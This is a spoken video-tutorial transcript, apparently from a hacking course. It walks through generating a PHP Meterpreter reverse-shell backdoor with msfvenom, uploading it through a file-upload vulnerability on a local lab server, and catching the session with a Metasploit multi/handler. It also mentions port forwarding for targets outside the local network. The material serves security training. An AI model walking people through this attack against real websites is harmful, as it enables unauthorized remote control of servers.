Welcome back everyone. In this video I will show you how to create a PHP backdoor that you can use to upload on a website for the file upload vulnerability. So in this video let's get started. Let me just clear the screen. Yeah, so what you want to do is you want to use a command and a program that is MSF VENOM. So this program enables us to create payloads. Now this is the metasploitable part. So we are creating a payload and we are using MSFV enum. Then you want to type in -p, and P stands for payload, and we want to select a payload. So here we'll be using php/meterpreter and then reverse TCP. So we're going to use this payload here, MSFV enum -p, and the payload is php/meterpreter/reverse TCP. Now we want to specify a listening port for it. So we'll be typing L port is equal to, and now we will give it a port. So basically you can give any port you like. In my case I want to give 7777. And the last thing which we want to type in is an IP address that the payload will be listening for. So the listener's IP address is L host is equal to, and the space is less, so it is going in the next line. Okay, so lhost is equal to, let me just reduce, yeah, that's perfect. So for the IP address you want to open a new tab and you want to type in ifconfig, ifconfig. Just press enter, and yeah, okay, I'm not root here, so I'll just, or let me just be root here. Just a second. Yeah, so I am root now. ifconfig, and now I'll show you all the devices you have. So this is Ethernet, and here is the IP address, which is this one, inet 192.168.131.129. in my case. This will be different in your case. Copy this up and paste it right out here. So this is just coming in the next line, right? And now after doing this all, so we have used the MSFV enum command, then we have used the -p for payload, and we have specified a payload. Then we have used the L port is equal to, then a port number which we have specified here, and then a L host, which is the IP address, and then equal to sign, and then the host which we have just specified here. Now we want a file, a payload file. For that we need an output. So we will just type in here -f. Okay, and this is for format, in which format we want the output. So in this case we want the format as a row. So it'll just pop out everything, it'll just bluff everything right out here, straight down right out here. So after this command, when you press enter, wait for a second, and it'll just pop out with a lot of codes here. And here is the code, and basically you don't need this one, so I'm just going to close this up. Okay, so here's the PHP code which you want. Now what you want to do is, from the first letter here, you want to copy this whole. Okay, you want to open any text editor. I'm opening Leafpad. Just paste this whole thing. Just click on file, save, and save it anywhere like desktop. Just give it a name, payload.php, anything, it can be anything, name. So I'm just giving it as payload.php. Just click on save, and that is how you create a payload.php. Now this file needs to be uploaded on any website, and that will give you a meterpreter session. But how would you access the control? You might just upload this file, but how would you get the control? How would you control everything? For that, we don't need this anymore. I'm just gonna clear the screen. Okay, just remember which port you use. This is 7777. Now in this case, let's say let's assume you were successful and you uploaded this file. Now we need a prompt, a way to access that file. Okay, so how we're going to do that? For that we'll be using MSF console. Okay, so that will just give us the prompt here. So just type in MSF console and it will just start up the Metasploit framework. So here we are in the Metasploit framework here. Now what you want to type is use multi. So we want to use the multi/handler. So we want to use multi/handler. This will just load up the exploit. Now we want to specify the payload. Set payload, and then the payload was php slash meterpreter slash reverse TCP. So this was the payload which we used. Right out here, set payload and then the payload, and just press enter. And now we want to set up the L host and the L port. So set L port and then the port number. So we specified the port number as 7777. And now we want to specify the IP address, which is the set L host. And I forgot the host, so let me just get that out. Yeah, so here is the IP address. So just paste that IP address in, just press enter. Now when you have set everything, you might want to check out show options. Just press enter and I'll show you the options. So there were two options, L host and L port, and both of them has been set, right? So we have got the correct L host and the correct L port. Now when you are ready, you just need to type in exploit, or you can even type in run. So in any way you can just type in anything you want. I'm just going to type that up. I'm just going to press enter and it's going to run now. So as soon as you open this file on that website, it'll just get started. You'll get a Metasploit session right out here. Now I'm just going to rename this file to anything else, because in last video we have already uploaded a payload.php, so we cannot access this one. We cannot just overwrite the file, so we will just name it as backdoor.php in this one case. So we have this one. Now we want to start up a new terminal. Okay, so here I just started up the Apache 2 server and MySQL server. So now let me just show you how it works. In last video you have already seen how it works. Anyway, so this was easy till now, but the main problem is when you upload the file, most of the times you are unable to upload the file. You cannot upload the file so easily, like in this case, because this was on very low security, so that is how you were able to upload. Now when you just upload the file, you just need not to do anything. You just wanna go to the path here and just press enter. That's so simple. When you just press enter, it'll just try to connect. Will not be able to connect, but you will just get a Meterpreter session right out here. You can just see that here. And now you might wanna type in help, and that will show you some help commands there. You can just do a lot of things from this. You can do anything. So you can even type just ps, and they'll show you all the processes that are running on the system. Right out here you can just see that. So you can just see all the processes are listed right out here. So these all are the ports and processes going on. You can do a lot of things. You can even hack the whole system if you just are able to get a simple Metaprinter shell. That is how you create a payload with Metaprinter and how you just get a session. Now you can just type in exit, I believe, and you can here as well type in exit. Okay, that is how. As soon as you exit, you can just see it just return nothing, right? Now if you try to access this file, there is no socket because nothing is there listening at the network. So whenever you want to listen to this network, you just want to go ahead and type in MSF console, and then from there the journey starts. You want to use the use multi-handler, and then just set the payload, set the local host, set the listening port, set the listening host, and you're ready to go. Just go ahead and type in exploit and just run the file. You will get the console here. You will get the access. But one thing to remember here, guys, this only works when the web server is in your local network. So if you are hacking up a site that is not in your network, obviously you are not connected to the network. So in that case, you need to port forward. And for that, you might want to see the Metasploit section, in which you will learn a lot of things, how to port forward and how to uh, get the payload working on the other networks outside yours. So that is a big concept, but the main thing here is to practice the file upload vulnerability, not the Metasploit. So we are not mastering the Metasploit in this section. We are only mastering the file upload vulnerability. I'll see you in the next video. Thank you for watching.